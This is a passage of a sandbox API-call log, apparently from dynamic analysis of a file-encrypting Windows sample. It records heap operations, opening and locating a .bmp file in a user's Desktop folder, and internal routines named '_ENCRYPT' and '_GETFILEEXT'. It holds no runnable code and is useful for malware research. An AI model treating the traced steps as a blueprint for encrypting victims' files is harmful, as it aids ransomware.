(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\mq1qqynaiw1i2bdfj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=85, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xaa) returned 0x7c55e8 [0030.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=85, lpWideCharStr=0x7c55e8, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp") returned 85 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.731] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0030.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0030.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.732] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0030.733] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0030.734] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.734] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0030.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cee0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0030.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.734] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0030.735] CloseHandle (hObject=0x128) returned 1 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.735] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.736] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0030.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0030.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0030.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0030.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0030.736] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0030.736] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0030.736] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.736] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.736] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.736] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.736] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.736] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.736] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c499ca0, ftCreationTime.dwHighDateTime=0x1d5c5db, ftLastAccessTime.dwLowDateTime=0x1b6ea610, ftLastAccessTime.dwHighDateTime=0x1d5c16d, ftLastWriteTime.dwLowDateTime=0x1b6ea610, ftLastWriteTime.dwHighDateTime=0x1d5c16d, nFileSizeHigh=0x0, nFileSizeLow=0x121b4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="mq1QQyNAiW1I2BdfJ.bmp", cAlternateFileName="MQ1QQY~1.BMP")) returned 0x7c20c0 [0030.736] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.736] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.736] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", 